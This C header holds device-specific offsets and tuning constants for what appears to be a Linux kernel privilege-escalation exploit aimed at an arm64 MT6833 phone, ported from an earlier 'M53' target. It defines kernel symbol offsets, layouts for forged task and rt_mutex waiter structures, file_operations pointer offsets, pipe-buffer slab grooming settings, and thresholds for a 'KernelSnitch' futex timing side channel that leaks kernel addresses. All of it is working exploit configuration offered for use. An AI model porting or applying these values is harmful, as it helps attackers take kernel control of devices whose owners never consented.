#define SLIDE_ROOT_TASK_GROUP_OFF                  0x1c53640ULL /* SH53D STATIC, System.map; M53 was ROOT_TASK_GROUP_OFF */
#define SLIDE_SYSCTL_BOOTID_OFF                    0 /* SH53D UNUSED: slide_app path only (have sysctl_bootid off if ever needed) */
#define SLIDE_NFULNL_LOGGER_NAME_IMAGE             0 /* SH53D UNUSED: slide_app path only */
#define SLIDE_NFULNL_LOGGER_OBJECT_IMAGE           0 /* SH53D UNUSED: slide_app path only */
#define SLIDE_RANDOM_TABLE_BOOT_ID_DATA_PTR_IMAGE  0 /* SH53D UNUSED: slide_app path only */
#define SLIDE_INIT_TASK_IMAGE                      (KIMAGE_TEXT_BASE + SLIDE_INIT_TASK_OFF) /* SH53D DERIVED */
#define SLIDE_ROOT_TASK_GROUP_IMAGE                (KIMAGE_TEXT_BASE + SLIDE_ROOT_TASK_GROUP_OFF) /* SH53D DERIVED */
#define SLIDE_SYSCTL_BOOTID_IMAGE                  0 /* SH53D UNUSED: slide_app path only */
#define LOCK_OFF                                   0x2090 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define W0_OFF                                     0x2350 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define FOPS_OFF                                   0x2000 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define SCRATCH_OFF                                0x3000 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define RIGHT_OFF                                  0x4440 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define LEFT_OFF                                   0x5550 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define FAKE_TASK_OFF                              0x3200 /* SH53D EMPIRICAL: M53 initial value, retune if unstable */
#define FAKE_WAITER_PI_TREE_ENTRY_OFF              0x18 /* SH53D NOTE: pi_tree_entry member; verify against DWARF */
#define RT_MUTEX_WAITERS_OFF                       0x8ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x08 */
#define RT_MUTEX_OWNER_OFF                         0x18ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x18 */
#define FAKE_WAITER_TASK_OFF                       0x30ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x30 */
#define FAKE_WAITER_LOCK_OFF                       0x38ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x38 */
#define FAKE_WAITER_PRIO_OFF                       0x40ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x40 */
#define FAKE_WAITER_DEADLINE_OFF                   0x48ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x48 */
#define FAKE_WAITER_LAYOUT_SIZE                    0x50 /* SH53D NOTE: legacy 10-qword synthetic layout; keep 0x50 */
#define FAKE_TASK_USAGE_OFF                        0x30ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x30 */
#define FAKE_TASK_PRIO_OFF                         0x78ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x78 */
#define FAKE_TASK_NORMAL_PRIO_OFF                  0x80ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x80 */
#define FAKE_TASK_TASK_GROUP_OFF                   0x338ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x338 */
#define FAKE_TASK_PI_LOCK_OFF                      0x82cULL /* SH53D STATIC, DWARF(pahole); M53 was 0x82c */
#define FAKE_TASK_PI_WAITERS_OFF                   0x838ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x838 */
#define FAKE_TASK_PI_TOP_TASK_OFF                  0x848ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x848 */
#define FAKE_TASK_PI_BLOCKED_ON_OFF                0x850ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x850 */
#define CFG_PAGE_OFF                               0x10ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x10 */
#define CFG_NEEDS_READ_FILL_OFF                    0x40ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x40 */
#define CFG_BIN_BUFFER_OFF                         0x48ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x48 */
#define CFG_BIN_BUFFER_SIZE_OFF                    0x50ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x50 */
#define CFG_CB_MAX_SIZE_OFF                        0x54ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x54 */
#define WQ_DFL_PWQ_OFF                             0 /* SH53D UNUSED: UMH path only (value matches ours) */
#define PWQ_POOL_OFF                               0 /* SH53D UNUSED: UMH path only */
#define PWQ_WQ_OFF                                 0 /* SH53D UNUSED: UMH path only */
#define PWQ_WORK_COLOR_OFF                         0 /* SH53D UNUSED: UMH path only */
#define PWQ_REFCNT_OFF                             0 /* SH53D UNUSED: UMH path only */
#define PWQ_NR_IN_FLIGHT_OFF                       0 /* SH53D UNUSED: UMH path only */
#define PWQ_NR_ACTIVE_OFF                          0 /* SH53D UNUSED: UMH path only */
#define PWQ_MAX_ACTIVE_OFF                         0 /* SH53D UNUSED: UMH path only */
#define POOL_WORKLIST_OFF                          0 /* SH53D UNUSED: UMH path only */
#define POOL_NR_IDLE_OFF                           0 /* SH53D UNUSED: UMH path only */
#define POOL_IDLE_LIST_OFF                         0 /* SH53D UNUSED: UMH path only */
#define WORKER_TASK_OFF                            0 /* SH53D UNUSED: UMH path only */
#define WORKER_POOL_OFF                            0 /* SH53D UNUSED: UMH path only */
#define WORK_DATA_OFF                              0 /* SH53D UNUSED: UMH path only */
#define WORK_ENTRY_OFF                             0 /* SH53D UNUSED: UMH path only */
#define WORK_FUNC_OFF                              0 /* SH53D UNUSED: UMH path only */
#define STRUCT_PAGE_SIZE                           0x40 /* SH53D NOTE: 64 by definition on arm64 4k pages */
#define STRUCT_PAGE_COMPOUND_HEAD_OFF              0x8ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x08 */
#define STRUCT_SLAB_CACHE_OFF                      0x18ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x18 */
#define STRUCT_PAGE_TYPE_OFF                       0x30 /* SH53D NOTE: verify use site in pipe.c */
#define KMALLOC_PIPE_INDEX                         10 /* SH53D KEEP:  */
#define KMALLOC_PIPE_OBJ_SIZE                      0x400 /* SH53D KEEP:  */
#define PIPE_OBJS_PER_SLAB                         32 /* SH53D KEEP:  */
#define PIPE_BUFFER_SLOTS                          16 /* SH53D KEEP:  */
#define PIPE_DRAIN_SLABS                           4 /* SH53D KEEP:  */
#define PIPE_RECLAIM_SLABS                         16 /* SH53D KEEP:  */
#define PIPE_RESIZE_BEST_EFFORT                    1 /* SH53D KEEP:  */
#define PIPE_BUF_FLAG_CAN_MERGE                    0 /* SH53D KEEP:  */
#define FOPS_OWNER_OFF                             0x0ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x00 */
#define FOPS_LLSEEK_OFF                            0x8ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x08 */
#define FOPS_READ_OFF                              0x10ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x10 */
#define FOPS_WRITE_OFF                             0x18ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x18 */
#define FOPS_READ_ITER_OFF                         0x20ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x20 */
#define FOPS_WRITE_ITER_OFF                        0x28ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x28 */
#define FOPS_IOCTL_OFF                             0x48ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x48 */
#define FOPS_COMPAT_IOCTL_OFF                      0x50ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x50 */
#define FOPS_MMAP_OFF                              0x58ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x58 */
#define FOPS_OPEN_OFF                              0x68ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x68 */
#define FOPS_RELEASE_OFF                           0x78ULL /* SH53D STATIC, DWARF(pahole); M53 was 0x78 */
#define FOPS_SPLICE_READ_OFF                       0xc0ULL /* SH53D STATIC, DWARF(pahole); M53 was 0xc0 */
#define FOPS_SHOW_FDINFO_OFF                       0xd8ULL /* SH53D STATIC, DWARF(pahole); M53 was 0xd8 */

/* SH-53D-only additions (absent upstream) */
#define KERNELSNITCH_THRESHOLD_MULT                200 /* SH53D-ONLY: device-measured: full-walk ~8000 ticks vs noise <=44; M53 default 10x picks noise on MT6833 */
#define SH53D_RATIOMETRIC_COLLISIONS               1 /* SH53D-ONLY: compare each candidate vs interleaved refs; immune to cpufreq drift; 0=upstream absolute logic */
#define SH53D_RATIO_LO                             400 /* SH53D-ONLY: below system cluster, above noise; partial-pile hypothesis */
#define SH53D_RATIO_HI                             4000 /* SH53D-ONLY: below system cluster; partial-pile hypothesis */
#define SH53D_MAX_TRIPLES                          1 /* SH53D-ONLY: try successive kept triples; purity insurance */
#define SH53D_TOLERANT_COLLISION_SCORE             8
#define KERNELSNITCH_FUTEX_HASH_SIZE               2048
#define KERNELSNITCH_MEASURE_CORE                  7
#define SH53D_SCAN_BUDGET                          131072
#define SH53D_SKIP_DOUBLING_FILTER                 1
#define ROUTE_WAIT_SECONDS                         25 /* SH53D-ONLY: sweet spot over 8s (owner slow) and 120s (consumer miss) */

#endif /* SH53D_TARGET_H */
